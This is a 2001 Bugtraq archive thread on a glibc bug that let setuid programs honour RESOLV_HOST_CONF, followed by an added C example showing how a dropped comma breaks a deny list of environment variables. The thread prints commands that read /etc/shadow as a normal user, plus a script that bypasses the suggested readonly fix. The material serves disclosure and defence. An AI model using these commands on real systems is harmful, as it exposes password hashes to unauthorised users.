Bugtraq mailing list archives

Re: Glibc Local Root Exploit
From: Digital Overdrive <digiover () dsinet org>
Date: Wed, 10 Jan 2001 23:43:31 +0100

Charles Stevenson wrote:

Hi all,
  This has been bouncing around on vuln-dev and the debian-devel lists. It
affects glibc >= 2.1.9x and it would seem many if not all OSes using these
versions of glibc. Ben Collins writes, "This wasn't supposed to happen, and
the actual fix was a missing comma in the list of secure env vars that were
supposed to be cleared when a program starts up suid/sgid (including
RESOLV_HOST_CONF)." The exploit varies from system to system but in our
devel version of Yellow Dog Linux I was able to print the /etc/shadow file
as a normal user in the following manner:

export RESOLV_HOST_CONF=/etc/shadow
ssh whatever.host.com

huge typo in my previous post...
services has to be profiles ;-)

[Credits to ^herman^ in #hit2000 on ircnet]
A temporary solution is to place this in /etc/profiles:

jan () flits102-93:~$ export RESOLV_HOST_CONF=/etc/shadow
bash: RESOLV_HOST_CONF: readonly variable
jan () flits102-93:~$

But even here there is a workaround for it:
Make a script (e.g. blaat)

export RESOLV_HOST_CONF=/etc/shadow
ssh whatever.host.com

~$ sh --noprofile blaat

[again credits to ^herman^]


Jan (Digital Overdrive)

 .~.   http://www.dsinet.org | http://www.dsinet.org/hackfaq
 /V\   digiover () dsinet org |  digiover () cotse com
/( )\
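The "missing comma" Ben Collins mentions in the quoted post is worth seeing in code. The following is an added illustration written for this archive page; it is not glibc's source and not from either poster. It shows a hypothetical set-user-ID startup scrub over a deny list of environment variable names, with the list once written correctly and once with a single comma dropped. Because C joins adjacent string literals at compile time, the dropped comma fuses two entries into one name that matches nothing, the compiler accepts it silently, and the variable escapes the scrub. The list contents, the sample environment and the function names (deny_list_len, scrub_env, resolv_host_conf_survives) are assumptions chosen for the example.

```c
/* Added illustration (not glibc's actual code): how a setuid startup path
 * might scrub a deny list of unsafe environment variables, and how a single
 * missing comma in that list silently disables one entry. The variable
 * names in the lists, the sample environment and the function names are
 * assumptions chosen for this example. */
#include <stdio.h>
#include <string.h>

/* Correct deny list: one string literal per entry. */
static const char *const unsecure_vars_fixed[] = {
    "LD_PRELOAD",
    "LD_LIBRARY_PATH",
    "RESOLV_HOST_CONF",
    "LOCALDOMAIN",
    NULL
};

/* The same list with the comma after RESOLV_HOST_CONF dropped. C joins
 * adjacent string literals at compile time, so the third and fourth entries
 * fuse into "RESOLV_HOST_CONFLOCALDOMAIN", a name no real variable carries;
 * the compiler accepts it and both variables escape scrubbing. */
static const char *const unsecure_vars_buggy[] = {
    "LD_PRELOAD",
    "LD_LIBRARY_PATH",
    "RESOLV_HOST_CONF"   /* <-- missing comma: constructed defect */
    "LOCALDOMAIN",
    NULL
};

/* Number of entries in a NULL-terminated deny list. */
size_t deny_list_len(const char *const *deny)
{
    size_t n = 0;
    while (deny[n] != NULL)
        n++;
    return n;
}

/* True when a "NAME=value" entry has exactly the given NAME. */
static int env_name_matches(const char *entry, const char *name)
{
    size_t len = strlen(name);
    return strncmp(entry, name, len) == 0 && entry[len] == '=';
}

/* Remove every entry of envp whose name is on the deny list, compacting the
 * array in place. Returns the number of entries removed. */
int scrub_env(char **envp, const char *const *deny)
{
    int removed = 0;
    char **out = envp;
    for (char **in = envp; *in != NULL; in++) {
        int drop = 0;
        for (const char *const *d = deny; *d != NULL; d++) {
            if (env_name_matches(*in, *d)) {
                drop = 1;
                break;
            }
        }
        if (drop)
            removed++;
        else
            *out++ = *in;
    }
    *out = NULL;
    return removed;
}

/* Scrub a constructed sample environment with DENY and report whether
 * RESOLV_HOST_CONF survived: 1 if it is still present (scrub failed),
 * 0 if it was removed. */
int resolv_host_conf_survives(const char *const *deny)
{
    char e0[] = "PATH=/usr/bin:/bin";
    char e1[] = "RESOLV_HOST_CONF=/etc/shadow";   /* constructed sample */
    char e2[] = "HOME=/home/user";
    char e3[] = "LD_PRELOAD=/tmp/unsafe.so";       /* constructed sample */
    char *envp[] = { e0, e1, e2, e3, NULL };

    scrub_env(envp, deny);
    for (char **p = envp; *p != NULL; p++)
        if (env_name_matches(*p, "RESOLV_HOST_CONF"))
            return 1;
    return 0;
}

int main(void)
{
    printf("fixed list: %zu entries, RESOLV_HOST_CONF survives=%d\n",
           deny_list_len(unsecure_vars_fixed),
           resolv_host_conf_survives(unsecure_vars_fixed));
    printf("buggy list: %zu entries, RESOLV_HOST_CONF survives=%d\n",
           deny_list_len(unsecure_vars_buggy),
           resolv_host_conf_survives(unsecure_vars_buggy));
    return 0;
}
```

The point for a defender is that the scrub has to happen in the library, at the moment the set-user-ID program starts, and has to be verified entry by entry (a unit test asserting the deny list's length, as above, would have caught the fused literal). Marking the variable `readonly` in a login profile, as suggested in the thread, only constrains shells that source that profile, which is why `sh --noprofile` sidesteps it.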
